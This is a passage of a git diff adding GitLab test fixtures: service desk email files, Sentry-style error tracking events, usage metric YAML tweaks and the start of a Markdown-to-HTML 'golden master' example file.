<CADkmRc+rNGAGGbV2iE5p918UVy4UyJqVcXRO2=otppgzduJSg@mail.gmail.com> +Subject: The message subject! @all +Mime-Version: 1.0 +Content-Type: text/plain; + charset=ISO-8859-1 +Content-Transfer-Encoding: 7bit +X-Sieve: CMU Sieve 2.2 +X-Received: by 10.0.0.1 with SMTP id n7mr11234144ipb.85.1371157428600; Thu, + 13 Jun 2013 14:03:48 -0700 (PDT) +X-Scanned-By: MIMEDefang 2.69 on IPv6:2001:470:1d:165::1 + +Service desk reply! + +/label ~label2 diff --git a/spec/fixtures/emails/service_desk_custom_address_x_envelope_to.eml b/spec/fixtures/emails/service_desk_custom_address_x_envelope_to.eml new file mode 100644 index 00000000000..1d6f362d3ce --- /dev/null +++ b/spec/fixtures/emails/service_desk_custom_address_x_envelope_to.eml @@ -0,0 +1,24 @@ +X-Envelope-To: support+project_slug-project_key@example.com +Return-Path: <alan@adventuretime.ooo> +Received: from iceking.adventuretime.ooo ([unix socket]) by iceking (Cyrus v2.2.13-Debian-2.2.13-19+squeeze3) with LMTPA; Thu, 13 Jun 2013 17:03:50 -0400 +Received: from mail-ie0-x234.google.com (mail-ie0-x234.google.com [IPv6:2607:f8b0:4001:c03::234]) by iceking.adventuretime.ooo (8.14.3/8.14.3/Debian-9.4) with ESMTP id r5DL3nFJ016967 (version=TLSv1/SSLv3 cipher=RC4-SHA bits=128 verify=NOT) for <incoming+gitlabhq/gitlabhq@appmail.adventuretime.ooo>; Thu, 13 Jun 2013 17:03:50 -0400 +Received: by mail-ie0-f180.google.com with SMTP id f4so21977375iea.25 for <incoming+email-test-project_id-issue-@appmail.adventuretime.ooo>; Thu, 13 Jun 2013 14:03:48 -0700 +Received: by 10.0.0.1 with HTTP; Thu, 13 Jun 2013 14:03:48 -0700 +Date: Thu, 13 Jun 2013 17:03:48 -0400 +From: Jake the Dog <alan@adventuretime.ooo> +To: support@example.com +Message-ID: <CAH_Wr+rNGAGGbV2iE5p918UVy4UyJqVcXRO2=otppgzduJSg@mail.gmail.com> +In-Reply-To: <CADkmRc+rNGAGGbV2iE5p918UVy4UyJqVcXRO2=otppgzduJSg@mail.gmail.com> +Subject: The message subject! @all +Mime-Version: 1.0 +Content-Type: text/plain; + charset=ISO-8859-1 +Content-Transfer-Encoding: 7bit +X-Sieve: CMU Sieve 2.2 +X-Received: by 10.0.0.1 with SMTP id n7mr11234144ipb.85.1371157428600; Thu, + 13 Jun 2013 14:03:48 -0700 (PDT) +X-Scanned-By: MIMEDefang 2.69 on IPv6:2001:470:1d:165::1 + +Service desk reply! + +/label ~label2 diff --git a/spec/fixtures/emails/service_desk_forwarded.eml b/spec/fixtures/emails/service_desk_forwarded.eml index ab509cf55af..45ac419e42f 100644 --- a/spec/fixtures/emails/service_desk_forwarded.eml +++ b/spec/fixtures/emails/service_desk_forwarded.eml @@ -8,7 +8,7 @@ Date: Thu, 13 Jun 2013 17:03:48 -0400 From: Jake the Dog <jake.g@adventuretime.ooo> To: support@adventuretime.ooo Delivered-To: support@adventuretime.ooo -Message-ID: <CADkmRc+rNGAGGbV2iE5p918UVy4UyJqVcXRO2=otppgzduJSg@mail.gmail.com> +Message-ID: <CADkmRc+rNGAGGbV2iE5p918UVy4UyJqVcXRO2=fdskbsf@mail.gmail.com> Subject: The message subject! @all Mime-Version: 1.0 Content-Type: text/plain; diff --git a/spec/fixtures/emails/service_desk_reply.eml b/spec/fixtures/emails/service_desk_reply.eml new file mode 100644 index 00000000000..8e1d9aaf2d3 --- /dev/null +++ b/spec/fixtures/emails/service_desk_reply.eml @@ -0,0 +1,23 @@ +Return-Path: <alan@adventuretime.ooo> +Received: from iceking.adventuretime.ooo ([unix socket]) by iceking (Cyrus v2.2.13-Debian-2.2.13-19+squeeze3) with LMTPA; Thu, 13 Jun 2013 17:03:50 -0400 +Received: from mail-ie0-x234.google.com (mail-ie0-x234.google.com [IPv6:2607:f8b0:4001:c03::234]) by iceking.adventuretime.ooo (8.14.3/8.14.3/Debian-9.4) with ESMTP id r5DL3nFJ016967 (version=TLSv1/SSLv3 cipher=RC4-SHA bits=128 verify=NOT) for <incoming+gitlabhq/gitlabhq@appmail.adventuretime.ooo>; Thu, 13 Jun 2013 17:03:50 -0400 +Received: by mail-ie0-f180.google.com with SMTP id f4so21977375iea.25 for <incoming+email-test-project_id-issue-@appmail.adventuretime.ooo>; Thu, 13 Jun 2013 14:03:48 -0700 +Received: by 10.0.0.1 with HTTP; Thu, 13 Jun 2013 14:03:48 -0700 +Date: Thu, 13 Jun 2013 17:03:48 -0400 +From: Jake the Dog <alan@adventuretime.ooo> +To: incoming+email-test-project_id-issue-@appmail.adventuretime.ooo +Message-ID: <CAH_Wr+rNGAGGbV2iE5p918UVy4UyJqVcXRO2=otppgzduJSg@mail.gmail.com> +In-Reply-To: <CADkmRc+rNGAGGbV2iE5p918UVy4UyJqVcXRO2=otppgzduJSg@mail.gmail.com> +Subject: The message subject! @all +Mime-Version: 1.0 +Content-Type: text/plain; + charset=ISO-8859-1 +Content-Transfer-Encoding: 7bit +X-Sieve: CMU Sieve 2.2 +X-Received: by 10.0.0.1 with SMTP id n7mr11234144ipb.85.1371157428600; Thu, + 13 Jun 2013 14:03:48 -0700 (PDT) +X-Scanned-By: MIMEDefang 2.69 on IPv6:2001:470:1d:165::1 + +Service desk reply! + +/label ~label2 diff --git a/spec/fixtures/emails/valid_new_issue_with_only_quotes.eml b/spec/fixtures/emails/valid_new_issue_with_only_quotes.eml new file mode 100644 index 00000000000..1629b9a54bc --- /dev/null +++ b/spec/fixtures/emails/valid_new_issue_with_only_quotes.eml @@ -0,0 +1,23 @@ +Return-Path: <jake@adventuretime.ooo> +Received: from iceking.adventuretime.ooo ([unix socket]) by iceking (Cyrus v2.2.13-Debian-2.2.13-19+squeeze3) with LMTPA; Thu, 13 Jun 2013 17:03:50 -0400 +Received: from mail-ie0-x234.google.com (mail-ie0-x234.google.com [IPv6:2607:f8b0:4001:c03::234]) by iceking.adventuretime.ooo (8.14.3/8.14.3/Debian-9.4) with ESMTP id r5DL3nFJ016967 (version=TLSv1/SSLv3 cipher=RC4-SHA bits=128 verify=NOT) for <incoming+gitlabhq/gitlabhq@appmail.adventuretime.ooo>; Thu, 13 Jun 2013 17:03:50 -0400 +Received: by mail-ie0-f180.google.com with SMTP id f4so21977375iea.25 for <incoming+gitlabhq-gitlabhq@appmail.adventuretime.ooo>; Thu, 13 Jun 2013 14:03:48 -0700 +Received: by 10.0.0.1 with HTTP; Thu, 13 Jun 2013 14:03:48 -0700 +Date: Thu, 13 Jun 2013 17:03:48 -0400 +From: Jake the Dog <jake@adventuretime.ooo> +To: incoming+gitlabhq-gitlabhq-project_id-auth_token-issue@appmail.adventuretime.ooo +Message-ID: <CADkmRc+rNGAGGbV2iE5p918UVy4UyJqVcXRO2=otppgzduJSg@mail.gmail.com> +Subject: New Issue by email +Mime-Version: 1.0 +Content-Type: text/plain; + charset=ISO-8859-1 +Content-Transfer-Encoding: 7bit +X-Sieve: CMU Sieve 2.2 +X-Received: by 10.0.0.1 with SMTP id n7mr11234144ipb.85.1371157428600; Thu, + 13 Jun 2013 14:03:48 -0700 (PDT) +X-Scanned-By: MIMEDefang 2.69 on IPv6:2001:470:1d:165::1 + +> This email has been forwarded without new content. +> There are only quotes. +> Quote 1 +> Quote 2 diff --git a/spec/fixtures/error_tracking/parsed_event_nullbytes.json b/spec/fixtures/error_tracking/parsed_event_nullbytes.json new file mode 100644 index 00000000000..570a5a329a4 --- /dev/null +++ b/spec/fixtures/error_tracking/parsed_event_nullbytes.json @@ -0,0 +1,175 @@ +{ + "breadcrumbs" : { + "values" : [ + { + "category" : "start_processing.action_controller", + "data" : { + "action" : "error2", + "controller" : "PostsController", + "format" : "html", + "method" : "GET", + "params" : { + "action" : "error2", + "controller" : "posts" + }, + "path" : "/posts/error2", + "start_timestamp" : 1625749156.5553 + }, + "level" : null, + "message" : "", + "timestamp" : 1625749156, + "type" : null + }, + { + "category" : "process_action.action_controller", + "data" : { + "action" : "error2", + "controller" : "PostsController", + "db_runtime" : 0, + "format" : "html", + "method" : "GET", + "params" : { + "action" : "error2", + "controller" : "posts" + }, + "path" : "/posts/error2", + "start_timestamp" : 1625749156.55539, + "view_runtime" : null + }, + "level" : null, + "message" : "", + "timestamp" : 1625749156, + "type" : null + } + ] + }, + "contexts" : { + "os" : { + "build" : "20.5.0", + "kernel_version" : "Darwin Kernel Version 20.5.0: Sat May 8 05:10:33 PDT 2021; root:xnu-7195.121.3~9/RELEASE_X86_64", + "name" : "Darwin", + "version" : "Darwin Kernel Version 20.5.0: Sat May 8 05:10:33 PDT 2021; root:xnu-7195.121.3~9/RELEASE_X86_64" + }, + "runtime" : { + "name" : "ruby", + "version" : "ruby 2.5.1p57 (2018-03-29 revision 63029) [x86_64-darwin19]" + }, + "trace" : { + "description" : null, + "op" : "rails.request", + "parent_span_id" : null, + "span_id" : "4a3ed8701e7f4ea4", + "status" : null, + "trace_id" : "d82b93fbc39e4d13b85762afa2e3ff36" + } + }, + "environment" : "development", + "event_id" : "7c9ae6e58f03442b9203bbdcf6ae904c", + "exception" : { + "values" : [ + { + "module" : "ActionView", + "stacktrace" : { + "frames" : [ + { + "abs_path" : "/Users/developer/.asdf/installs/ruby/2.5.1/lib/ruby/gems/2.5.0/gems/puma-3.12.6/lib/puma/thread_pool.rb", + "context_line" : " block.call(work, *extra)\n", + "filename" : "puma/thread_pool.rb", + "function" : "block in spawn_thread", + "in_app" : false, + "lineno" : 135, + "post_context" : [ + " rescue Exception => e\u0000\n", + " STDERR.puts \"Error\u0000reached top of thread-pool: #{e.message} (#{e.class})\"\n", + " end\n" + ], + "pre_context" : [ + " end\n", + "\n", + " begin\n" + ], + "project_root" : "/Users/developer/rails-project" + }, + { + "abs_path" : "/Users/developer/.asdf/installs/ruby/2.5.1/lib/ruby/gems/2.5.0/gems/puma-3.12.6/lib/puma/server.rb", + "context_line" : " process_client client, buffer\n", + "filename" : "puma/server.rb", + "function" : "block in run", + "in_app" : false, + "lineno" : 334, + "post_context" : [ + " else\n", + " client.set_timeout @first_data_timeout\n", + " @reactor.add client\n" + ], + "pre_context" : [ + " client.close\n", + " else\n", + " if process_now\n" + ], + "project_root" : "/Users/developer/rails-project" + }, + { + "abs_path" : "/Users/developer/.asdf/installs/ruby/2.5.1/lib/ruby/gems/2.5.0/gems/actionview-5.2.6/lib/action_view/path_set.rb", + "context_line" : " find_all(*args).first || raise(MissingTemplate.new(self, *args))\n", + "filename" : "action_view/path_set.rb", + "function" : "find", + "in_app" : false, + "lineno" : 48, + "post_context" : [ + " end\n", + "\n", + " def find_file(path, prefixes = [], *args)\n" + ], + "pre_context" : [ + " end\n", + "\n", + " def find(*args)\n" + ], + "project_root" : "/Users/developer/rails-project" + } + ] + }, + "thread_id" : 70254489510160, + "type" : "ActionView::MissingTemplate", + "value" : "Missing template posts/error2, application/error2 with {:locale=>[:en], :formats=>[:html], :variants=>[], :handlers=>[:raw, :erb, :html, :builder, :ruby, :coffee, :jbuilder]}. Searched in:\n * \"/Users/developer/rails-project/app/views\"\n" + } + ] + }, + "extra" : {}, + "fingerprint" : [], + "level" : "error", + "message" : "", + "modules" : { + "concurrent-ruby" : "1.1.9", + "i18n" : "1.8.10", + "minitest" : "5.14.4", + "rake" : "13.0.3", + "thread_safe" : "0.3.6", + "tzinfo" : "1.2.9", + "uglifier" : "4.2.0", + "web-console" : "3.7.0" + }, + "platform" : "ruby", + "release" : "db853d7", + "request" : { + "env" : { + "SERVER_NAME" : "localhost", + "SERVER_PORT" : "4444" + }, + "headers" : {}, + "method" : "GET", + "url" : "http://localhost/posts/error2" + }, + "sdk" : { + "name" : "sentry.ruby.rails", + "version" : "4.5.1" + }, + "server_name" : "MacBook.local", + "tags" : { + "request_id" : "4253dcd9-5e48-474a-89b4-0e945ab825af" + }, + "timestamp" : "2021-07-08T12:59:16Z", + "transaction" : "PostsController#error2", + "user" : {} +} diff --git a/spec/fixtures/error_tracking/python_event_repl.json b/spec/fixtures/error_tracking/python_event_repl.json new file mode 100644 index 00000000000..bb2891c744a --- /dev/null +++ b/spec/fixtures/error_tracking/python_event_repl.json @@ -0,0 +1 @@ +{"breadcrumbs":{"values":[]},"contexts":{"runtime":{"build":"3.9.5 (default, May 12 2021, 15:36:59) \n[GCC 8.3.0]","name":"CPython","version":"3.9.5"}},"environment":"production","event_id":"","exception":{"values":[{"mechanism":null,"module":null,"stacktrace":{"frames":[{"abs_path":"/srv/autodevops/<stdin>","context_line":null,"filename":"<stdin>","function":"<module>","in_app":true,"lineno":2,"module":"__main__","post_context":[],"pre_context":[],"vars":{"__annotations__":{},"__builtins__":"<module 'builtins' (built-in)>","__doc__":"None","__loader__":"<class '_frozen_importlib.BuiltinImporter'>","__name__":"'__main__'","__package__":"None","__spec__":"None","capture_exception":"<function capture_exception at 0x7f5dbb3eb940>","e":"ZeroDivisionError('division by zero')","init":"<function _init at 0x7f5dbb3ea1f0>"}}]},"type":"ZeroDivisionError","value":"division by zero"}]},"extra":{"sys.argv":[""]},"level":"error","modules":{"appdirs":"1.4.4","apscheduler":"3.7.0","asgiref":"3.3.4","beautifulsoup4":"4.9.3","certifi":"2020.12.5","chardet":"4.0.0","django":"3.2.3","django-anymail":"1.3","django-environ":"0.4.5","django-livereload-server":"0.3.2","django-widget-tweaks":"1.4.8","fcache":"0.4.7","idna":"2.10","mmh3":"3.0.0","pip":"21.1.2","psycopg2-binary":"2.8.6","pytz":"2021.1","requests":"2.25.1","sentry-sdk":"1.5.0","setuptools":"57.0.0","six":"1.16.0","soupsieve":"2.2.1","sqlparse":"0.4.1","tornado":"6.1","tzlocal":"2.1","unleashclient":"4.2.0","urllib3":"1.26.4","uwsgi":"2.0.19.1","wheel":"0.36.2"},"platform":"python","sdk":{"integrations":["argv","atexit","dedupe","django","excepthook","logging","modules","stdlib","threading","tornado"],"name":"sentry.python","packages":[{"name":"pypi:sentry-sdk","version":"1.5.0"}],"version":"1.5.0"},"server_name":"","timestamp":"2021-11-17T14:46:20.898210Z"} diff --git a/spec/fixtures/lib/generators/gitlab/usage_metric_definition_generator/sample_metric.yml b/spec/fixtures/lib/generators/gitlab/usage_metric_definition_generator/sample_metric.yml index 16ca71f24ae..a5bdd378f53 100644 --- a/spec/fixtures/lib/generators/gitlab/usage_metric_definition_generator/sample_metric.yml +++ b/spec/fixtures/lib/generators/gitlab/usage_metric_definition_generator/sample_metric.yml @@ -13,6 +13,7 @@ introduced_by_url: time_frame: 7d data_source: data_category: operational +instrumentation_class: Count performance_indicator_type: distribution: - ce diff --git a/spec/fixtures/lib/generators/gitlab/usage_metric_definition_generator/sample_metric_with_ee.yml b/spec/fixtures/lib/generators/gitlab/usage_metric_definition_generator/sample_metric_with_ee.yml index 060ab7baccf..4931285f6cf 100644 --- a/spec/fixtures/lib/generators/gitlab/usage_metric_definition_generator/sample_metric_with_ee.yml +++ b/spec/fixtures/lib/generators/gitlab/usage_metric_definition_generator/sample_metric_with_ee.yml @@ -13,6 +13,7 @@ introduced_by_url: time_frame: 7d data_source: data_category: optional +instrumentation_class: Count performance_indicator_type: distribution: - ee diff --git a/spec/fixtures/lib/generators/gitlab/usage_metric_definition_generator/sample_metric_with_name_suggestions.yml b/spec/fixtures/lib/generators/gitlab/usage_metric_definition_generator/sample_metric_with_name_suggestions.yml index e373d6a9e45..39472af686d 100644 --- a/spec/fixtures/lib/generators/gitlab/usage_metric_definition_generator/sample_metric_with_name_suggestions.yml +++ b/spec/fixtures/lib/generators/gitlab/usage_metric_definition_generator/sample_metric_with_name_suggestions.yml @@ -14,6 +14,7 @@ introduced_by_url: time_frame: 7d data_source: data_category: optional +instrumentation_class: Count performance_indicator_type: distribution: - ce diff --git a/spec/fixtures/markdown/markdown_golden_master_examples.yml b/spec/fixtures/markdown/markdown_golden_master_examples.yml new file mode 100644 index 00000000000..b024064dc21 --- /dev/null +++ b/spec/fixtures/markdown/markdown_golden_master_examples.yml @@ -0,0 +1,840 @@ +# Related Specs: +# +# This data file drives the specs in the following specs: +# +# CE Backend: spec/requests/api/markdown_golden_master_spec.rb +# CE Frontend: spec/frontend/content_editor/markdown_processing_spec.js +# +# For EE, these files are used: +# EE Data: ee/spec/fixtures/markdown/markdown_golden_master_examples.yml +# EE Backend: ee/spec/requests/api/markdown_golden_master_spec.rb +# EE Frontend: ee/spec/frontend/content_editor/ee_markdown_processing_spec.js +# +# +# Requirements: +# +# 1. Frontend: We should have test coverage that the Content Editor can properly serialize HTML +# to Markdown for all GFM source elements which it currently supports. +# 2. Frontend: We should have test coverage that the Content Editor can properly render the expected +# HTML for all GFM source elements which it currently supports (not currently implemented in the +# frontend - this will likely be a standalone module outside of the Content Editor). +# 3. Backend: We should ensure that for all GFM elements, the backend always renders the expected +# HTML, for **all** supported GFM source elements. +# +# If any of this this ever changes unexpectedly, tests will start failing, and force the same change +# to be made on the backend and frontend. +# +# +# Overview: +# +# These specs ensure that the bidirectional Markdown <-> HTML conversion logic is implemented +# identically on the backend and frontend, for all supported GitLab-Flavored Markdown examples, by +# running hardcoded examples through the logic and ensuring the results match. +# +# This is an example of the "Golden Master Testing" approach, which is also referred to as +# "Approval Testing" or "Characterization Testing". +# +# The term "Golden Master" originally comes from the recording industry, and refers to process +# of "mastering", or making a final mix from which all other copies will be produced. +# +# See: +# - https://en.wikipedia.org/wiki/Characterization_test +# - https://en.wikipedia.org/wiki/Gold_master_(disambiguation) +# +# +# What we are doing is actually a type Golden Master testing with modifications: +# +# 1. The original markdown examples used to drive the tests are taken from this YAML, and can be +# considered a form of "fixture" in this case. +# 2. The HTML in the YAML is the "Golden Master", but we are going to use it to assert +# against **TWO** different implementations of markdown rendering: +# 1. The frontend, implemented as Jest specs. +# 1. This will assert both HTML -> markdown serialization (what it currently does), as well as... +# 2. Markdown -> HTML rendering (not currently implemented in the frontend - this will likely +# be a standalone module outside of the Content Editor) +# 1. The backend, implemented as requests specs +# 1. This will assert markdown -> HTML conversion by the backend. +# +# Also see the MR for more explanation on the details of this approach: +# https://gitlab.com/gitlab-org/gitlab/-/merge_requests/68671 +# +# +# Usage: +# +# * Please keep this file alphabetized. +# * To run focused example(s), set the `FOCUSED_MARKDOWN_EXAMPLES` environment variable to a +# comma-separated list of example names. This works for the frontend and backend specs. +# * Required attributes for every example: +# 1. `name`: Specifies the Name of the example, which will be printed when specs are run. +# 2. `markdown`: Specifies the Markdown for the example, which will be compared with the +# Markdown the code generates from the corresponding specified HTML. +# 3. `html`: Specifies the HTML for the example, which will be compared with the +# HTML the code generated from the corresponding specified Markdown. +# * `api_context` (optional): This is used when a single markdown can be +# rendered differently depending on the API endpoint or area of the app from which it is called or +# used. The valid values for `api_context` are: `project`, `group`, `project_wiki`, +# and (for EE only) `group_wiki`.The `name` attribute must also have a `_for_[API_CONTEXT]` suffix +# which matches the `api_context`, in order to ensure that each example has a unique `name` +# identifier. For example, `attachment_image_for_project`. +# * `pending`: To skip an example that is broken or not yet fully implemented, add +# a `pending: <reason with issue/MR URL>` attribute to the example. See +# the `a_example_of_pending` entry for an example. +# * `pending` with key: You can also mark an example pending on only the frontend or backend. See +# the `a_example_of_pending_with_keys` entry for an example. +# * `substitutions`: For examples which may have variable content in different environments, +# such as portions of the URI, or database record IDs, you can specify +# `substitutions`, which is an array of regex/replacement pairs. The HTML +# value will be normalized with each of these pairs using Ruby `gsub` +# before comparing. +# The substitution values can (and are) also reused in multiple examples +# via YAML anchors. +# +# +# Notes: +# +# * The html values should exactly match what the backend markdown API endpoints return for the +# given markdown example. The HTML is intentionally not indented, formatted, or split across lines. +# This is a bit less readable, but it makes the spec logic simpler and less error prone for edge +# cases. +# +# +# Debugging Failures and Writing New Entries: +# +# * You need to compare what is different between the expected and actual values. +# * In rspec, the diff printed out includes the full text of the HTML. This may be long, so you +# may want to turn line wrapping on or off or copy the diff to separate file(s) for easier comparison. +# * If the difference is just in an attribute value, use the `substitutions` support to normalize +# the HTML before comparing. These specs are only validating the HTML structure, the individual +# markdown elements' unit tests can provide coverage that the exact attribute values are correct. +# * If you are making a new entry, you can create the entry according to the `Usage` section above, +# but leave the `html` value blank. This will cause the spec to fail, and you can fill in the +# `html` value based on the spec failure that is printed out. + +--- +#- name: an_example_of_pending +# pending: 'This is an example of the pending attribute: http://example.com' +# markdown: ;) +# html: |- +# <blink data-sourcepos="1:1-1:2"/></blink> +# + +#- name: an_example_of_pending_with_keys +# pending: +# frontend: 'This is an example of the frontend-only pending attribute: http://example.com' +# backend: 'This is an example of the backend-only pending attribute: http://example.com' +# markdown: ;) +# html: |- +# <blink data-sourcepos="1:1-1:2"/></blink> + +- name: attachment_image_for_group + api_context: group + substitutions: + # Note: having the top level `substitutions` data structure be a hash of arrays + # allows us to compose multiple substitutions via YAML anchors (YAML anchors + # pointing to arrays can't be combined) + uri_substitution: &uri_substitution + # NOTE: We don't care about verifying specific attribute values here, that should be the + # responsibility of unit tests. These tests are about the structure of the HTML. + - regex: '(href|data-src)(=")(.*?)(test-file\.(png|zip)")' + replacement: '\1\2URI_PREFIX\4' + markdown: |- + ![test-file](/uploads/aa45a38ec2cfe97433281b10bbff042c/test-file.png) + html: |- + <p data-sourcepos="1:1-1:69" dir="auto"><a class="no-attachment-icon gfm" href="/groups/group58/-/uploads/aa45a38ec2cfe97433281b10bbff042c/test-file.png" target="_blank" rel="noopener noreferrer" data-canonical-src="/uploads/aa45a38ec2cfe97433281b10bbff042c/test-file.png" data-link="true"><img src="data:image/gif;base64,R0lGODlhAQABAAAAACH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" alt="test-file" class="lazy gfm" data-src="/groups/group58/-/uploads/aa45a38ec2cfe97433281b10bbff042c/test-file.png" data-canonical-src="/uploads/aa45a38ec2cfe97433281b10bbff042c/test-file.png"></a></p> + +- name: attachment_image_for_project + api_context: project + substitutions: + uri_substitution: *uri_substitution + markdown: |- + ![test-file](/uploads/aa45a38ec2cfe97433281b10bbff042c/test-file.png) + html: |- + <p data-sourcepos="1:1-1:69" dir="auto"><a class="no-attachment-icon gfm" href="/group58/project22/uploads/aa45a38ec2cfe97433281b10bbff042c/test-file.png" target="_blank" rel="noopener noreferrer" data-canonical-src="/uploads/aa45a38ec2cfe97433281b10bbff042c/test-file.png" data-link="true"><img src="data:image/gif;base64,R0lGODlhAQABAAAAACH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" alt="test-file" class="lazy gfm" data-src="/group58/project22/uploads/aa45a38ec2cfe97433281b10bbff042c/test-file.png" data-canonical-src="/uploads/aa45a38ec2cfe97433281b10bbff042c/test-file.png"></a></p> + +- name: attachment_image_for_project_wiki + api_context: project_wiki + substitutions: + uri_substitution: *uri_substitution + markdown: |- + ![test-file](test-file.png) + html: |- + <p data-sourcepos="1:1-1:27" dir="auto"><a class="no-attachment-icon" href="/group1/project1/-/wikis/test-file.png" target="_blank" rel="noopener noreferrer" data-canonical-src="test-file.png"><img alt="test-file" class="lazy" data-src="/group1/project1/-/wikis/test-file.png" data-canonical-src="test-file.png"></a></p> + +- name: attachment_link_for_group + api_context: group + substitutions: + uri_substitution: *uri_substitution + markdown: |- + [test-file](/uploads/aa45a38ec2cfe97433281b10bbff042c/test-file.zip) + html: |- + <p data-sourcepos="1:1-1:68" dir="auto"><a href="/groups/group58/-/uploads/aa45a38ec2cfe97433281b10bbff042c/test-file.zip" data-canonical-src="/uploads/aa45a38ec2cfe97433281b10bbff042c/test-file.zip" data-link="true" class="gfm">test-file</a></p> + +- name: attachment_link_for_project + api_context: project + substitutions: + uri_substitution: *uri_substitution + markdown: |- + [test-file](/uploads/aa45a38ec2cfe97433281b10bbff042c/test-file.zip) + html: |- + <p data-sourcepos="1:1-1:68" dir="auto"><a href="/group58/project22/uploads/aa45a38ec2cfe97433281b10bbff042c/test-file.zip" data-canonical-src="/uploads/aa45a38ec2cfe97433281b10bbff042c/test-file.zip" data-link="true" class="gfm">test-file</a></p> + +- name: attachment_link_for_project_wiki + api_context: project_wiki + substitutions: + uri_substitution: *uri_substitution + # TODO: The current frontend example doesn't include the path, need to look into why it does after refactoring to the new golden master approach + pending: + frontend: 'The current frontend example doesnt include the path, need to look into why it does after refactoring to the new golden master approach' + markdown: |- + [test-file](test-file.zip) + html: |- + <p data-sourcepos="1:1-1:26" dir="auto"><a href="/group1/project1/-/wikis/test-file.zip" data-canonical-src="test-file.zip">test-file</a></p> + +- name: audio + markdown: |- + ![Sample Audio](https://gitlab.com/gitlab.mp3) + html: |- + <p data-sourcepos="1:1-1:46" dir="auto"><span class="media-container audio-container"><audio src="https://gitlab.com/gitlab.mp3" controls="true" data-setup="{}" data-title="Sample Audio"></audio><a href="https://gitlab.com/gitlab.mp3" target="_blank" rel="nofollow noreferrer noopener" title="Download 'Sample Audio'">Sample Audio</a></span></p> + +- name: audio_and_video_in_lists + markdown: |- + * ![Sample Audio](https://gitlab.com/1.mp3) + * ![Sample Video](https://gitlab.com/2.mp4) + + 1. ![Sample Video](https://gitlab.com/1.mp4) + 2. ![Sample Audio](https://gitlab.com/2.mp3) + + * [x] ![Sample Audio](https://gitlab.com/1.mp3) + * [x] ![Sample Audio](https://gitlab.com/2.mp3) + * [x] ![Sample Video](https://gitlab.com/3.mp4) + html: |- + <ul data-sourcepos="1:1-3:0" dir="auto"> + <li data-sourcepos="1:1-1:43"><span class="media-container audio-container"><audio src="https://gitlab.com/1.mp3" controls="true" data-setup="{}" data-title="Sample Audio"></audio><a href="https://gitlab.com/1.mp3" target="_blank" rel="nofollow noreferrer noopener" title="Download 'Sample Audio'">Sample Audio</a></span></li> + <li data-sourcepos="2:1-3:0"><span class="media-container video-container"><video src="https://gitlab.com/2.mp4" controls="true" data-setup="{}" data-title="Sample Video" width="400" preload="metadata"></video><a href="https://gitlab.com/2.mp4" target="_blank" rel="nofollow noreferrer noopener" title="Download 'Sample Video'">Sample Video</a></span></li> + </ul> + <ol data-sourcepos="4:1-6:0" dir="auto"> + <li data-sourcepos="4:1-4:44"><span class="media-container video-container"><video src="https://gitlab.com/1.mp4" controls="true" data-setup="{}" data-title="Sample Video" width="400" preload="metadata"></video><a href="https://gitlab.com/1.mp4" target="_blank" rel="nofollow noreferrer noopener" title="Download 'Sample Video'">Sample Video</a></span></li> + <li data-sourcepos="5:1-6:0"><span class="media-container audio-container"><audio src="https://gitlab.com/2.mp3" controls="true" data-setup="{}" data-title="Sample Audio"></audio><a href="https://gitlab.com/2.mp3" target="_blank" rel="nofollow noreferrer noopener" title="Download 'Sample Audio'">Sample Audio</a></span></li> + </ol> + <ul data-sourcepos="7:1-9:47" class="task-list" dir="auto"> + <li data-sourcepos="7:1-7:47" class="task-list-item"> + <input type="checkbox" class="task-list-item-checkbox" checked disabled> <span class="media-container audio-container"><audio src="https://gitlab.com/1.mp3" controls="true" data-setup="{}" data-title="Sample Audio"></audio><a href="https://gitlab.com/1.mp3" target="_blank" rel="nofollow noreferrer noopener" title="Download 'Sample Audio'">Sample Audio</a></span> + </li> + <li data-sourcepos="8:1-8:47" class="task-list-item"> + <input type="checkbox" class="task-list-item-checkbox" checked disabled> <span class="media-container audio-container"><audio src="https://gitlab.com/2.mp3" controls="true" data-setup="{}" data-title="Sample Audio"></audio><a href="https://gitlab.com/2.mp3" target="_blank" rel="nofollow noreferrer noopener" title="Download 'Sample Audio'">Sample Audio</a></span> + </li> + <li data-sourcepos="9:1-9:47" class="task-list-item"> + <input type="checkbox" class="task-list-item-checkbox" checked disabled> <span class="media-container video-container"><video src="https://gitlab.com/3.mp4" controls="true" data-setup="{}" data-title="Sample Video" width="400" preload="metadata"></video><a href="https://gitlab.com/3.mp4" target="_blank" rel="nofollow noreferrer noopener" title="Download 'Sample Video'">Sample Video</a></span> + </li> + </ul> + +- name: blockquote + markdown: |- + > This is a blockquote + > + > This is another one + html: |- + <blockquote data-sourcepos="1:1-3:21" dir="auto"> + <p data-sourcepos="1:3-1:22">This is a blockquote</p> + <p data-sourcepos="3:3-3:21">This is another one</p> + </blockquote> + +- name: bold + markdown: |- + **bold** + html: |- + <p data-sourcepos="1:1-1:8" dir="auto"><strong>bold</strong></p> + +- name: bullet_list_style_1 + markdown: |- + * list item 1 + * list item 2 + * embedded list item 3 + html: |- + <ul data-sourcepos="1:1-3:24" dir="auto"> + <li data-sourcepos="1:1-1:13">list item 1</li> + <li data-sourcepos="2:1-3:24">list item 2 + <ul data-sourcepos="3:3-3:24"> + <li data-sourcepos="3:3-3:24">embedded list item 3</li> + </ul> + </li> + </ul> + +- name: bullet_list_style_2 + markdown: |- + - list item 1 + - list item 2 + * embedded list item 3 + html: |- + <ul data-sourcepos="1:1-3:24" dir="auto"> + <li data-sourcepos="1:1-1:13">list item 1</li> + <li data-sourcepos="2:1-3:24">list item 2 + <ul data-sourcepos="3:3-3:24"> + <li data-sourcepos="3:3-3:24">embedded list item 3</li> + </ul> + </li> + </ul> + +- name: bullet_list_style_3 + markdown: |- + + list item 1 + + list item 2 + - embedded list item 3 + html: |- + <ul data-sourcepos="1:1-3:24" dir="auto"> + <li data-sourcepos="1:1-1:13">list item 1</li> + <li data-sourcepos="2:1-3:24">list item 2 + <ul data-sourcepos="3:3-3:24"> + <li data-sourcepos="3:3-3:24">embedded list item 3</li> + </ul> + </li> + </ul> + +- name: code_block + markdown: |- + ```javascript + console.log('hello world') + ``` + html: |- + <div class="gl-relative markdown-code-block js-markdown-code"> + <pre data-sourcepos="1:1-3:3" class="code highlight js-syntax-highlight language-javascript" lang="javascript" v-pre="true"><code><span id="LC1" class="line" lang="javascript"> <span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="dl">'</span><span class="s1">hello world</span><span class="dl">'</span><span 